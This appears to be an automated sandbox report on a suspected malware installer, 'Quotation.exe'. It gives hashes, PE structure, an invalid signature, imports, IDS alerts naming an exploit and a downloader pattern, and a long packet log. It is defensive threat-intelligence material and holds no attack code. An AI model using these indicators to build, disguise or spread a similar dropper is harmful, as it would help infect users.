Preview:	degageredes indtgters commencing subfunctional rubiator startkatalogernes dismasted outsport..surkaalen syndedes turtledoving,leddelsestes obs jernholdigt normsammenbruds.azotite hestesko hvilkes snrkels enstatitite nappes,slangudtrykkets squills consonantising windchest interpretableness lynkrigen..vinders drikkegildet orgal snakkehjrnets responders etageejendommens..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.809791084590782
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quotation.exe
File size:	1'183'256 bytes
MD5:	eaad92690f4cc140b25affb391767c48
SHA1:	2f161c2e596eaca3f903f56fc24561c610ce0bcc
SHA256:	6d3bda97722c347d083d7127f23eae6f28e86ee31a8b9b643826a44bdc97be69
SHA512:	b9755a349d09904ed4f1c702353e9f8c3e8b4063f25eb349695452bcce1f930b3473ce1a0c3f4b1749e8afbc643fc87e253188e33182c2ff0ee50ef23de67c80
SSDEEP:	24576:z4nhDoAFq/DZt9+jNcwHCBNFSgaEMZNXLGQ7WczkxFnfbP9b:z+hkxlijusC5SxHNXKQKczgF
TLSH:	8845231D32A6D08FD9820A394EF7F337EABAED143D109167B3311F4EAD352489987690
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............o...o...o...k...o...i...o...n...o...n...o.I.k...o.I.....o.I.m...o.Rich..o.................PE..L...!.*c.................n.

File Icon


Icon Hash:	873335651170390f

Static PE Info

General

Entrypoint:	0x4036da
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x632AE721 [Wed Sep 21 10:27:45 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3f91aceea750f765ef2ba5d9988e6a00

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=hankelses, O=hankelses, L=Limoges, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	30/07/2024 10:19:19 30/07/2027 10:19:19
Subject Chain	CN=hankelses, O=hankelses, L=Limoges, C=FR
Version:	3
Thumbprint MD5:	2007470A1CABFE5F2D6FD13CB18CA172
Thumbprint SHA-1:	5C5E783B19B2DEA5EB994B76C744BE265E141CCA
Thumbprint SHA-256:	14593829CD81502D3B32146462EE18D030160ACD7EB4CA4F2D5011E265D09715
Serial:	39B3676A3A42F6A340737E0F1B9583585BDD0F14

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408528h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [00408170h]
mov esi, dword ptr [004080ACh]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F124C8BFDB9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F124C8BFD93h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F124C8BFD8Dh
xor eax, eax
jmp 00007F124C8BFD74h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F124C8BFD8Dh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F124C8BFD86h
mov eax, dword ptr [esp+38h]
mov dword ptr [007A8638h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8a00	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3db000	0x3e910	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11fc28	0x11f0	.data
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6c0b	0x6e00	9178309eee1a86dc5ef945d6826a6897	False	0.6605823863636363	data	6.398414552532143	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1896	0x1a00	0885e83a553c38819d1fab2908ca0cf5	False	0.4307391826923077	data	4.86610208699674	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e640	0x200	5c0f03a1a77f205400c2cbabec9976c4	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x3a9000	0x32000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3db000	0x3e910	0x3ea00	2690c3c0c1de505f961321c7e2d6da34	False	0.6915076097804391	data	6.574790239627466	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3db388	0x16482	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	1.000394451383867
RT_ICON	0x3f1810	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.486498876138649
RT_ICON	0x402038	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.5308492747529956
RT_ICON	0x40b4e0	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.5497227356746766
RT_ICON	0x410968	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.5415682569674067
RT_ICON	0x414b90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5884854771784233
RT_ICON	0x417138	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.6179643527204502
RT_ICON	0x4181e0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6668032786885246
RT_ICON	0x418b68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7287234042553191
RT_DIALOG	0x418fd0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4190d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4191f0	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4192b8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x419318	0x84	Targa image data - Map 32 x 25730 x 1 +1	English	United States	0.7348484848484849
RT_VERSION	0x4193a0	0x220	data	English	United States	0.5110294117647058
RT_MANIFEST	0x4195c0	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5529131985731273

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	ShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	DispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
GDI32.dll	SetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
KERNEL32.dll	WriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T20:29:00.538849+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49730	TCP
2024-11-01T20:29:40.608953+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.4	49736	TCP
2024-11-01T20:29:54.703324+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49794	172.217.18.14	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 20:29:53.369462013 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:53.369502068 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:53.369571924 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:53.383081913 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:53.383101940 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.272624969 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.272711992 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.273643970 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.273710966 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.327918053 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.327960014 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.328254938 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.328321934 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.334271908 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.379347086 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.703403950 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.704189062 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.704202890 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.704278946 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.704377890 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.704448938 CET	443	49794	172.217.18.14	192.168.2.4
Nov 1, 2024 20:29:54.704510927 CET	49794	443	192.168.2.4	172.217.18.14
Nov 1, 2024 20:29:54.739665985 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:54.739717007 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:54.739784002 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:54.740046024 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:54.740060091 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:55.633881092 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:55.633968115 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:55.638144016 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:55.638153076 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:55.638401031 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:55.638449907 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:55.638817072 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:55.683331966 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.465162992 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.465235949 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.465356112 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.465415001 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.471033096 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.471108913 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.471144915 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.471185923 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.472368956 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.472434044 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.472462893 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.472512007 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.472542048 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.472589016 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.473109961 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.473162889 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.473197937 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.473252058 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.485028028 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.485105991 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.485131979 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.485181093 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.485238075 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.485285044 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.485392094 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.485440969 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.495456934 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.495512009 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.495543957 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.495599031 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.509198904 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.509253979 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.509320974 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.509377003 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.509411097 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.509453058 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.509510040 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.509558916 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.517333984 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.517384052 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.517415047 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.517460108 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.587747097 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.587802887 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.587826967 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.587829113 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.587865114 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.587884903 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.587884903 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.587903976 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.588594913 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.588641882 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.588649988 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.588691950 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.588700056 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.588742018 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.589379072 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.589426041 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.589443922 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.589488029 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.589976072 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.590018988 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.590024948 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.590074062 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.590079069 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.590125084 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.590795040 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.590842962 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.591063976 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.591111898 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.591670036 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.591713905 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.592004061 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.592048883 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.592056036 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.592099905 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.596090078 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.596132040 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.596141100 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.596149921 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.596173048 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.596198082 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.596395969 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.596440077 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.596446991 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.596483946 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.605057001 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.605129957 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.605139017 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.605173111 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.607883930 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.607938051 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.608140945 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.608191967 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.613759995 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.613812923 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.613822937 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.613861084 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.619505882 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.619658947 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.619672060 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.619721889 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.625008106 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.625077009 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.625092030 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.625133991 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.630836010 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.630933046 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.630942106 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.631277084 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.636759043 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.636814117 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.636821985 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.636862993 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.642077923 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.642129898 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.642170906 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.642206907 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.647840023 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.647883892 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.647892952 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.647934914 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.653673887 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.653723001 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.653736115 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.653770924 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711004972 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711199045 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711227894 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711262941 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711273909 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711302996 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711309910 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711357117 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711410999 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711461067 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711503029 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711555004 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711590052 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711643934 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.711699009 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.711744070 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.712215900 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.712269068 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.712331057 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.712378025 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.712445974 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.712496042 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.712538004 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.712585926 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.712620020 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.712666988 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.713035107 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.713085890 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.713200092 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.713252068 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.713319063 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.713371992 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.713426113 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.713474989 CET	49801	443	192.168.2.4	142.250.185.129
Nov 1, 2024 20:29:58.713803053 CET	443	49801	142.250.185.129	192.168.2.4
Nov 1, 2024 20:29:58.713852882 CET	49801	443	192.168.2.4	142.250.185.129
